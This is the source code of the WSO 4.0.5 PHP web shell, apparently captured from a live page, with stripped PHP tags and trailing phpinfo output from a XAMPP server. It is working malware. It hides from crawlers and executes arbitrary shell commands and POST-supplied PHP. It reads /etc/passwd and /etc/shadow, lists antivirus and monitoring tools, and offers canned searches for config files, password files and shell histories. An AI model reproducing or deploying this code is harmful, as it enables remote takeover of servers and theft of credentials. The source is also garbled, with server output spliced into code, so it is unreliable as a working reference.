/* WSO 4.0.5 (Web Shell by HARD _LINUX) */$auth_pass = "21232f297a57a5a743894a0e4a801fc3"; //admin$color = "#fff";$default_action = 'FilesMan';@define('SELF_PATH', __FILE__);if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { header('HTTP/1.0 404 Not Found'); exit;}@session_start();@error_reporting(0);@ini_set('error_log',NULL);@ini_set('log_errors',0);@ini_set('max_execution_time',0);@set_time_limit(0);@set_magic_quotes_runtime(0);@define('VERSION', '4.0.5');if( get_magic_quotes_gpc() ) { function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); } $_POST = stripslashes_array($_POST);}function printLogin() { if(!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } die("<pre align=center>
Password: <input type=password name=pass style='background-color:whitesmoke;border:1px solid #FFF;'><input type=submit value='>>' style='border:none;background-color:teal;color:#fff;'>
</pre>");}if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] )) if( empty( $auth_pass ) || ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) ) $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; else printLogin();if( strtolower( substr(PHP_OS,0,3) ) == "win" ) $os = 'win';else $os = 'nix';$safe_mode = @ini_get('safe_mode');$disable_functions = @ini_get('disable_functions');$home_cwd = @getcwd();if( isset( $_POST['c'] ) ) @chdir($_POST['c']);$cwd = @getcwd();if( $os == 'win') { $home_cwd = str_replace("\\", "/", $home_cwd); $cwd = str_replace("\\", "/", $cwd);}if( $cwd[strlen($cwd)-1] != '/' ) $cwd .= '/';function printHeader() { if(empty($_POST['charset'])) $_POST['charset'] = "UTF-8"; global $color; <?=$_SERVER['HTTP_HOST']?> - WSO <?=VERSION?><meta http-equiv='Content-Type' content='text/html; charset==$_POST['charset']'><title>=$_SERVER['HTTP_HOST'] - WSO =VERSION</title><style> body {background-color:#000;color:#e1e1e1;} body,td,th {font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;} table.info {color:#C3C3C3;background-color:#000;} span,h1,a {color:=$color !important;} span {font-weight:bolder;} h1 {border-left:5px solid teal;padding:2px 5px;font:14pt Verdana;background-color:#222;margin:0px;} div.content {padding:5px;margin-left:5px;background-color:#000;} a {text-decoration:none;} a:hover {text-decoration:underline;} .ml1 {border:1px solid #444;padding:5px;margin:0;overflow:auto;} .bigarea {width:100%;height:250px; } input, textarea, select {margin:0;color:#fff;background-color:#444;border:1px solid #000; font:9pt Courier New;} form {margin:0px;} #toolsTbl {text-align:center;} .toolsInp {width:300px} .main th {text-align:left;background-color:#000;} .main tr:hover{background-color:#5e5e5e} .main td, th{vertical-align:middle} .l1 {background-color:#444} pre {font:9pt Courier New;}</style><script> function set(a,c,p1,p2,p3,charset) { if(a != null)document.mf.a.value=a; if(c != null)document.mf.c.value=c; if(p1 != null)document.mf.p1.value=p1; if(p2 != null)document.mf.p2.value=p2; if(p3 != null)document.mf.p3.value=p3; if(charset != null)document.mf.charset.value=charset; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); document.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = "ajax=true"; for(i=0;i<document.mf.elements.length;i++) params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value); sr('=$_SERVER['REQUEST_URI'];', params); } function sr(url, params) { if (window.XMLHttpRequest) { req = new XMLHttpRequest(); req.onreadystatechange = processReqChange; req.open("POST", url, true); req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded"); req.send(params); } else if (window.ActiveXObject) { req = new ActiveXObject("Microsoft.XMLHTTP"); if (req) { req.onreadystatechange = processReqChange; req.open("POST", url, true); req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded"); req.send(params); } } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { //alert(req.responseText); var reg = new RegExp("(\\d+)([\\S\\s]*)", "m"); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert("Request error!"); }</script><div style="position:absolute;width:100%;background-color:#444;top:0;left:0;">
<input type=hidden name=a value='=isset($_POST['a'])?$_POST['a']:'''><input type=hidden name=c value='=htmlspecialchars($GLOBALS['cwd'])'><input type=hidden name=p1 value='=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):'''><input type=hidden name=p2 value='=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):'''><input type=hidden name=p3 value='=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):'''><input type=hidden name=charset value='=isset($_POST['charset'])?$_POST['charset']:'''>
$freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname('r'); $kernel = @php_uname('s'); $millink='http://www.exploit-db.com/search/?action=search&description='; if( strpos('Linux', $kernel) !== false ) $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) ); else $millink .= urlencode( $kernel . ' ' . substr($release,0,3) ); if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(@posix_geteuid()); $gid = @posix_getgrgid(@posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0;$i<$n-1;$i++) { $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; for($j=0;$j<=$i;$j++) $cwd_links .= $path[$j].'/'; $cwd_links .= "\")'>".$path[$i]."/</a>"; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $item) $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>'; $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Port Scanner'=>'PortScanner','Bruteforce'=>'Bruteforce','Network'=>'Network','Domains'=>'Domains'); if(!empty($GLOBALS['auth_pass'])) $m['Logout'] = 'Logout'; $m['Self remove'] = 'SelfRemove'; $menu = ''; foreach($m as $k => $v) $menu .= '<th>[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>'; $drives = ""; if ($GLOBALS['os'] == 'win') { foreach( range('a','z') as $drive ) if (is_dir($drive.':\\')) $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> '; } echo '<table class=info cellpadding=3 cellspacing=0 width=100%><td width=1><span>Uname:
User:
Php:
Hdd:
Cwd:'.($GLOBALS['os'] == 'win'?'
Drives:':'').'</span>'. '<nobr>'.substr(@Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64, 0, 120).' <a href="http://www.google.com/search?q='.urlencode(@Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[Exploit-DB]</a></nobr>
'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )
'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#00A8A8>OFF</font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'
'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)
'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a>
'.$drives.''. '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select>
<span>Server IP:</span>
'.gethostbyname($_SERVER["HTTP_HOST"]).'
<span>Client IP:</span>
'.$_SERVER['REMOTE_ADDR'].'</nobr>'. '<table cellpadding=3 cellspacing=0 width=100% style="background-color:teal;">'.$menu.'<div>';}function printFooter() { $is_writable = is_writable($GLOBALS['cwd'])?"<font color=teal>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";</div><table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%">
<span>Change dir:</span>
<input class="toolsInp" type=text name=c value="=htmlspecialchars($GLOBALS['cwd']);"><input type=submit value=">>">
<span>Read file:</span>
<input class="toolsInp" type=text name=f><input type=submit value=">>">
<span>Make dir:</span>
<input class="toolsInp" type=text name=d><input type=submit value=">>">
=$is_writable
<span>Make file:</span>
<input class="toolsInp" type=text name=f><input type=submit value=">>">
=$is_writable
<span>Execute:</span>
<input class="toolsInp" type=text name=c value=""><input type=submit value=">>">
<input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='=htmlspecialchars($GLOBALS['cwd'])'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value='=isset($_POST['charset'])?$_POST['charset']:'''> <span>Upload file:</span>
<input class="toolsInp" type=file name=f><input type=submit value=">>">
=$is_writable </div>}if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }function ex($in) { $out = ''; if(function_exists('exec')) { @exec($in,$out); $out = @join("\n",$out); }elseif(function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); }elseif(function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); }elseif(function_exists('shell_exec')) { $out = shell_exec($in); }elseif(is_resource($f = @popen($in,"r"))) { $out = ""; while(!@feof($f)) $out .= fread($f,1024); pclose($f); }else return "↳ Unable to execute command\n"; return ($out==''?"↳ Query did not return anything\n":$out);}function viewSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B';}function perms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i;}function viewPermsColor($f) { if (!@is_readable($f)) return '<font color=#FF0000>'.perms(@fileperms($f)).'</font>'; elseif (!@is_writable($f)) return '<font color=white>'.perms(@fileperms($f)).'</font>'; else return '<font color=#00A8A8>'.perms(@fileperms($f)).'</font>';}if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) { $files[] = $filename; } return $files; }}function which($p) { $path = ex('which '.$p); if(!empty($path)) return $path; return false;}// Sec. Info go --------------------function actionSecInfo() { printHeader(); echo '

Server security information

<div class=content>'; function showSecParam($n, $v) { $v = trim($v); if($v) { echo '<span>'.$n.': </span>'; if(strpos($v, "\n") === false) echo $v.'
'; else echo '<pre class=ml1>'.$v.'</pre>'; } } showSecParam('Server software', @getenv('SERVER_SOFTWARE')); showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none'); showSecParam('Open base dir', @ini_get('open_basedir')); showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); showSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists('mssql_connect')) $temp[] = "MSSQL"; if(function_exists('pg_connect')) $temp[] = "PostgreSQL"; if(function_exists('oci_connect')) $temp[] = "Oracle"; showSecParam('Supported databases', implode(', ', $temp)); echo '
'; if( $GLOBALS['os'] == 'nix' ) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no'); showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no'); showSecParam('OS version', @file_get_contents('/proc/version')); showSecParam('Distr name', @file_get_contents('/etc/issue.net')); if(!$GLOBALS['safe_mode']) { echo '
'; $temp=array(); foreach ($userful as $item) if(which($item)){$temp[]=$item;} showSecParam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $item) if(which($item)){$temp[]=$item;} showSecParam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $item) if(which($item)){$temp[]=$item;} showSecParam('Downloaders', implode(', ',$temp)); echo '<br/>'; showSecParam('Hosts', @file_get_contents('/etc/hosts')); showSecParam('HDD space', ex('df -h')); showSecParam('Mount options', @file_get_contents('/etc/fstab')); echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span>
From<input type=text name=param1 value=0>
To<input type=text name=param2 value=1000>
<input type=submit value=">>">'; if (isset ($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) { $temp = ""; for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { $uid = @posix_getpwuid($_POST['p2']); if ($uid) $temp .= join(':',$uid)."\n"; } echo '<br/>'; showSecParam('Users', $temp); } } } else { showSecParam('OS Version',ex('ver')); showSecParam('Account Settings',ex('net accounts')); showSecParam('User Accounts',ex('net user')); } echo '</div>'; printFooter();}// Sec. Info end --------------------// File tools go -----------------------function actionFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']); if(@$_POST['p2']=='download') { if(is_file($_POST['p1']) && is_readable($_POST['p1'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: ".$type); } $fp = @fopen($_POST['p1'], "r"); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) { } exit; } if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if($fp) { $_POST['p2'] = "edit"; fclose($fp); } } } printHeader(); echo '

File tools

<div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; printFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1'])); $gid = @posix_getgrgid(@fileowner($_POST['p1'])); echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'
'; echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'

'; if( empty($_POST['p2']) ) $_POST['p2'] = 'view'; if( is_file($_POST['p1']) ) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); else $m = array('Chmod', 'Rename', 'Touch'); foreach($m as $v) echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ]':$v).'</a> '; echo '

'; switch($_POST['p2']) { case 'view': echo '<pre class=ml1>'; $fp = @fopen($_POST['p1'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo '</pre>'; break; case 'highlight': if( is_readable($_POST['p1']) ) { echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; $code = highlight_file($_POST['p1'],true); echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>'; } break; case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0; for($i=strlen($_POST['p3'])-1;$i>=0;--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); if(!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!
<script>document.mf.p3.value="";</script>'; else die('<script>g(null,null,null,null,"")</script>'); } echo '
<input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>">
'; break; case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; break; } if( !empty($_POST['p3']) ) { @file_put_contents($_POST['p1'],$_POST['p3']); echo 'Saved!
<script>document.mf.p3.value="";</script>'; } echo '
<textarea name=text class=bigarea>'; $fp = @fopen($_POST['p1'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo '</textarea><input type=submit value=">>">
'; break; case 'hexdump': $c = @file_get_contents($_POST['p1']); $n = 0; $h = array('00000000
','',''); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' '; switch ( ord($c[$i]) ) { case 0: $h[2] .= ' '; break; case 9: $h[2] .= ' '; break; case 10: $h[2] .= ' '; break; case 13: $h[2] .= ' '; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
';} $h[1] .= '
'; $h[2] .= "\n"; } } echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span><td bgcolor=#282828><pre>'.$h[1].'</pre><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre>'; break; case 'rename': if( !empty($_POST['p3']) ) { if(!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!
<script>document.mf.p3.value="";</script>'; else die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>'); } echo '
<input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>">
'; break; case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']); if($time) { if(@touch($_POST['p1'],$time,$time)) die('<script>g(null,null,null,null,"")</script>'); else { echo 'Fail!<script>document.mf.p3.value="";</script>'; } } else echo 'Bad time format!<script>document.mf.p3.value="";</script>'; } echo '
<input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>">
'; break; case 'mkfile': break; } echo '</div>'; printFooter();}// File tools end ----------------------// Console go --------------------if($os == 'win') $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" );else $aliases = array( "List dir" => "ls -la", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" ); function actionConsole() { if(!empty($_POST['p1']) && !empty($_POST['p2'])) { $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = true; $_POST['p1'] .= ' 2>&1'; } elseif(!empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = 0; if(isset($_POST['ajax'])) { $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; ob_start(); echo "document.cf.cmd.value='';\n"; $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\'\0")); if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) { if(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo "document.mf.c.value='".$GLOBALS['cwd']."';"; } } echo "document.cf.output.value+='".$temp."';"; echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "\n", $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = 0; printHeader();echo "<script>if(window.Event) window.captureEvents(Event.KEYDOWN);var cmds = new Array('');var cur = 0;function kp(e) { var n = (window.Event) ? e.which : e.keyCode; if(n == 38) { cur--; if(cur>=0) document.cf.cmd.value = cmds[cur]; else cur++; } else if(n == 40) { cur++; if(cur < cmds.length) document.cf.cmd.value = cmds[cur]; else cur--; }}function add(cmd) { cmds.pop(); cmds.push(cmd); cmds.push(''); cur = cmds.length-1;}</script>"; echo '

Console

<div class=content>
<select name=alias>'; foreach($GLOBALS['aliases'] as $n => $v) { if($v == '') { echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>'; continue; } echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>'; } echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value,document.cf.show_errors.checked?1:\'\');}else{g(null,null,document.cf.alias.value,document.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'; if(!empty($_POST['p1'])) { echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1'])); } echo '</textarea><table style="border:1px solid #000;background-color:#000;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><td style="padding-left:4px; width:13px;">$<input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);">'; echo '
</div><script>document.cf.cmd.focus();</script>'; printFooter();}// Console end --------------------// PHP -----------------------function actionPhp() { if( isset($_POST['ajax']) ) { $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; ob_start(); eval($_POST['p1']); $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; echo strlen($temp), "\n", $temp; exit; } printHeader(); if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) { echo '

PHP info

<div class=content>'; ob_start(); phpinfo()
PHP logo

PHP Version 7.2.12

System Linux Beneri 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64
Build Date Nov 14 2018 22:25:43
Configure Command './configure' '--prefix=/opt/lampp' '--with-apxs2=/opt/lampp/bin/apxs' '--with-config-file-path=/opt/lampp/etc' '--with-mysql=mysqlnd' '--enable-inline-optimization' '--disable-debug' '--enable-bcmath' '--enable-calendar' '--enable-ctype' '--enable-ftp' '--enable-gd-native-ttf' '--enable-magic-quotes' '--enable-shmop' '--disable-sigchild' '--enable-sysvsem' '--enable-sysvshm' '--enable-wddx' '--with-gdbm=/opt/lampp' '--with-jpeg-dir=/opt/lampp' '--with-png-dir=/opt/lampp' '--with-freetype-dir=/opt/lampp' '--with-zlib=yes' '--with-zlib-dir=/opt/lampp' '--with-openssl=/opt/lampp' '--with-xsl=/opt/lampp' '--with-ldap=/opt/lampp' '--with-gd' '--with-imap=/bitnami/xamppunixinstaller72stack-linux-x64/src/imap-2007e' '--with-imap-ssl' '--with-gettext=/opt/lampp' '--with-mssql=shared,/opt/lampp' '--with-pdo-dblib=shared,/opt/lampp' '--with-sybase-ct=/opt/lampp' '--with-mysql-sock=/opt/lampp/var/mysql/mysql.sock' '--with-mcrypt=/opt/lampp' '--with-mhash=/opt/lampp' '--enable-sockets' '--enable-mbstring=all' '--with-curl=/opt/lampp' '--enable-mbregex' '--enable-zend-multibyte' '--enable-exif' '--with-bz2=/opt/lampp' '--with-sqlite=shared,/opt/lampp' '--with-sqlite3=/opt/lampp' '--with-libxml-dir=/opt/lampp' '--enable-soap' '--with-xmlrpc' '--enable-pcntl' '--with-mysqli=mysqlnd' '--with-pgsql=shared,/opt/lampp/' '--with-iconv=/opt/lampp' '--with-pdo-mysql=mysqlnd' '--with-pdo-pgsql=/opt/lampp/postgresql' '--with-pdo_sqlite=/opt/lampp' '--with-icu-dir=/opt/lampp' '--enable-fileinfo' '--enable-phar' '--enable-zip' '--enable-intl' '--disable-huge-code-pages'
Server API Apache 2.0 Handler
Virtual Directory Support disabled
Configuration File (php.ini) Path /opt/lampp/etc
Loaded Configuration File /opt/lampp/etc/php.ini
Scan this dir for additional .ini files (none)
Additional .ini files parsed (none)
PHP API 20170718
PHP Extension 20170718
Zend Extension 320170718
Zend Extension Build API320170718,NTS
PHP Extension Build API20170718,NTS
Debug Build no
Thread Safety disabled
Zend Signal Handling enabled
Zend Memory Manager enabled
Zend Multibyte Support provided by mbstring
IPv6 Support enabled
DTrace Support disabled
Registered PHP Streamshttps, ftps, compress.zlib, compress.bzip2, php, file, glob, data, http, ftp, phar, zip
Registered Stream Socket Transportstcp, udp, unix, udg, ssl, sslv3, tls, tlsv1.0, tlsv1.1, tlsv1.2
Registered Stream Filterszlib.*, bzip2.*, convert.iconv.*, string.rot13, string.toupper, string.tolower, string.strip_tags, convert.*, consumed, dechunk
Zend logo This program makes use of the Zend Scripting Language Engine:
Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies

Configuration

apache2handler

Apache Version Apache/2.4.37 (Unix) OpenSSL/1.0.2p PHP/7.2.12 mod_perl/2.0.8-dev Perl/v5.16.3
Apache API Version 20120211
Server Administrator you@example.com
Hostname:Port localhost:0
User/Group daemon(1)/1
Max Requests Per Child: 0 - Keep Alive: on - Max Per Connection: 100
Timeouts Connection: 300 - Keep-Alive: 5
Virtual Server No
Server Root /opt/lampp
